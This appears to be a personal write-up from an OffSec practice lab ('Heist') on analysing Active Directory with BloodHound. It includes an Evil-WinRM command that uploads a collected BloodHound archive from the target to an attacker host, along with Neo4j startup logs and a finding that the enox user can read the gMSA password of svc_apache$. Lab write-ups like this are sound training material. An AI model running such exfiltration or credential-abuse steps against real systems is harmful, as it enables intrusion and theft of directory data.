InfoSec LAB

Heist_OffSec_BloodHound

Created: 1 min read

BloodHound

BloodHound

Ingestion

*Evil-WinRM* PS C:\tmp> iwr -Uri http://192.168.45.176:2222/ -Method POST -InFile .\heist.offsec_20250707081211_BloodHound.zip

Ingestion has already been made via adPEAS

Preps

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist/bloodhound]
└─$ neo4j_kickstart
[sudo] password for kali: 
2025-07-07 15:38:38.903+0000 INFO  Starting...
2025-07-07 15:38:39.373+0000 INFO  This instance is ServerId{823c0986} (823c0986-8860-45ad-af0e-a0f1316bef16)
2025-07-07 15:38:40.428+0000 INFO  ======== Neo4j 4.4.26 ========
2025-07-07 15:38:41.393+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-07-07 15:38:41.393+0000 INFO  Updating the initial password in component 'security-users'
2025-07-07 15:38:42.866+0000 INFO  Bolt enabled on localhost:7687.
2025-07-07 15:38:43.598+0000 INFO  Remote interface available at http://localhost:7474/
2025-07-07 15:38:43.603+0000 INFO  id: F22BE6505A50EE3B6AE80482B39DD2B6A7082E68C916A87DF6F1CD7ECA4DD942
2025-07-07 15:38:43.603+0000 INFO  name: system
2025-07-07 15:38:43.603+0000 INFO  creationDate: 2024-09-01T10:39:20.089Z
2025-07-07 15:38:43.604+0000 INFO  Started.
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist/bloodhound]
└─$ bloodhound-legacy

Starting neo4j and bloodhound

Ingested data uploaded

Domain

enox User

The transitive ReadGMSAPassword privilege over the svc_apache$ account. This has already been enumerated.

svc_apache$ Account

Interactive Graph View

Backlinks